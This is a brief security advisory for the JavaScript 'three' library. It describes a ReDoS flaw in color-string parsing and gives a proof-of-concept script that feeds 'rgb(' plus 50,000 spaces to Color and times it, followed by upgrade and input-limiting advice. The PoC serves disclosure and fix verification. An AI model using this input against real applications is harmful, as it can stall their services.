three
Versions of the `three` package before 0.125.0 are vulnerable to Regular Expression Denial of Service (ReDoS). This can happen when handling rgb or hsl colors.
var three = require('three')
/**
 * Build the test input used by the timing check below: the literal prefix
 * "rgb(" followed by `n` space characters. Nothing is appended after the
 * padding, so the string has no closing parenthesis.
 *
 * @param {number} n - Number of space characters to append after "rgb(".
 * @returns {string} "rgb(" followed by `n` spaces.
 */
function build_blank(n) {
  const pieces = ["rgb("];
  let added = 0;
  // Same iteration count as a counting for-loop bounded by `n`.
  while (added < n) {
    pieces.push(" ");
    added += 1;
  }
  return pieces.join("");
}
// Timing check for the Color string parser: construct a Color from the
// padded "rgb(" input and report the elapsed wall-clock time in milliseconds.
// Per the advisory, three releases before 0.125.0 are affected, so the
// reported time can be compared before and after upgrading to confirm the fix.
const { Color } = three;

// Date.now() has millisecond resolution, which is enough to see the difference
// between a prompt return and a parser that stalls on the input.
const startedAt = Date.now();
new Color(build_blank(50000));
const elapsedMs = Date.now() - startedAt;

console.log(`${elapsedMs} ms`);
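Upgrade `three` to version 0.125.0 or later. If an immediate upgrade is not possible, validate or length-limit color strings that come from untrusted sources before passing them to `Color`.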